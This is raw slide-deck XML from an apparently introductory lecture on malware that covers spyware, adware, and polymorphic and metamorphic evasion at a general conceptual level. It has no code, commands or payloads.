              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Adware can slow down a computer's performance and consume system resources, which can result in slow and unresponsive systems.</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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>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Annoying and distracting ads:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Adware can display pop-up ads, banners, and other types of advertisements, which can be distracting and annoying to users.</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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>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Privacy invasion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>: Some adware programs collect information about a user's online activities, including their browsing history, search terms, and geolocation information, which can be used to deliver targeted ads. This can result in a loss of privacy.</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2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>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Increased risk of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Some adware programs have been found to be bundled with malware, such as spyware and Trojans, which can cause further harm to a system.</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图片 116"/>
          <p:cNvPicPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610735" y="2492058"/>
            <a:ext cx="6845300" cy="1873885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:no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lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="88219F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Polymorphism and Metamorphism</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="88219F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A728B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占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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03</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="96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占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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Part Three</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="703" name="组合 702"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="696" name="L 形 695"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4663956" y="6008863"/>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98" name="L 形 697"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4818077" y="6008863"/>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00" name="L 形 699"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4972199" y="6008864"/>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02" name="直角三角形 701"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="862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704" name="矩形 703"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="A728BE"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="A728BE">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05" name="矩形 704"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="A728BE"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="A728BE">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568515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pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Overview</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cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="3036570"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1726" y="2132"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="圆角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2238" y="2251"/>
              <a:ext cx="8483" cy="1776"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="20E4F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5" name="椭圆 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1726" y="2132"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="08BDCD"/>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1" name="椭圆 20"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId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7" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864" y="2665"/>
              <a:ext cx="1736" cy="949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:normAutofit fontScale="8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10BDCC"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="10BDCC"/>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8" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741" y="2281"/>
              <a:ext cx="6979"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Adware</a:t>
              </a:r>
              <a:endPar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29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="4697095"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1725" y="4834"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2237" y="4953"/>
              <a:ext cx="8483" cy="1776"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A728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1" name="椭圆 30"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1725" y="4834"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="802196"/>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2" name="椭圆 31"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864" y="4973"/>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3" name="文本框 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2072" y="5367"/>
              <a:ext cx="1320" cy="949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" bIns="0" rtlCol="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802196"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="300" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="802196"/>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39" name="文本框 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3740" y="5003"/>
              <a:ext cx="6980" cy="1741"/>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Polymorphism and Metamorphism</a:t>
              </a:r>
              <a:endPar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6" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3240405" y="1376045"/>
            <a:ext cx="5711825" cy="1278890"/>
            <a:chOff x="1726" y="2132"/>
            <a:chExt cx="8995" cy="2014"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="圆角矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2238" y="2251"/>
              <a:ext cx="8483" cy="1776"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF4338"/>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8" name="椭圆 14"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1726" y="2132"/>
              <a:ext cx="2014" cy="2014"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E80A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0" name="椭圆 20"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1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1" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1864" y="2665"/>
              <a:ext cx="1736" cy="949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:normAutofit fontScale="8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rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endPar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12" name="文本框 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3741" y="2281"/>
              <a:ext cx="6980"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sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Spyware </a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="3000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="+mn-l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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Polymorphism</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3818890"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 16295"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="38100" dir="5400000" algn="t"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379" name="任意多边形 378"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050290" y="1355090"/>
            <a:ext cx="428625" cy="36893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rgbClr val="A728BE"/>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2"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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="934085" y="1789430"/>
            <a:ext cx="1006221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3500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Polymorphism is an evasion mechanism used by malware to evade detection by anti-virus products. Polymorphic malware is designed to change its appearance or behavior in order to evade detection. The malware modifies its code, file structure, or encryption method each time it is executed, making it difficult for anti-virus products to identify it.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="5021965"/>
            <a:ext cx="1029547" cy="1440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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2"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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="203200" y="1284910"/>
            <a:ext cx="11568430" cy="498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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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Code obfuscation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> This involves using techniques such as code encryption, code packing, and code mutating to make the malware code appear different from one instance to another, while still performing the same malicious actions.</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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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File packing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> This involves using software that compresses and encrypts a malware executable into a single file, making it difficult for anti-virus products to detect.</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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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File mutation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>: This involves making small modifications to the malware executable file, such as changing its size, timestamp, or adding junk data. This can make it difficult for signature-based anti-virus products to detect the malware, as its signature will be different from one instance to another.</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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metamorphism</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="203200" y="1213386"/>
            <a:ext cx="11568430" cy="493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3300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Metamorphism refers to the ability of a malware to modify its own code in a way that makes it difficult for anti-virus products to detect. Metamorphic malware changes its codes each time it is executed, while retaining its core functionality.</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3300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Metamorphism focuses on changing the code of the malware to evade detection while polymorphism focuses on changing the appearance of the malware to evade signature-based anti-virus products. However, it is also a more effective technique for evading anti-virus products, as it makes it difficult for security researchers to analyze and track the malware.</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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="203200" y="1225418"/>
            <a:ext cx="11568430" cy="498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476250">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="3228161236"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Code Obfuscation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
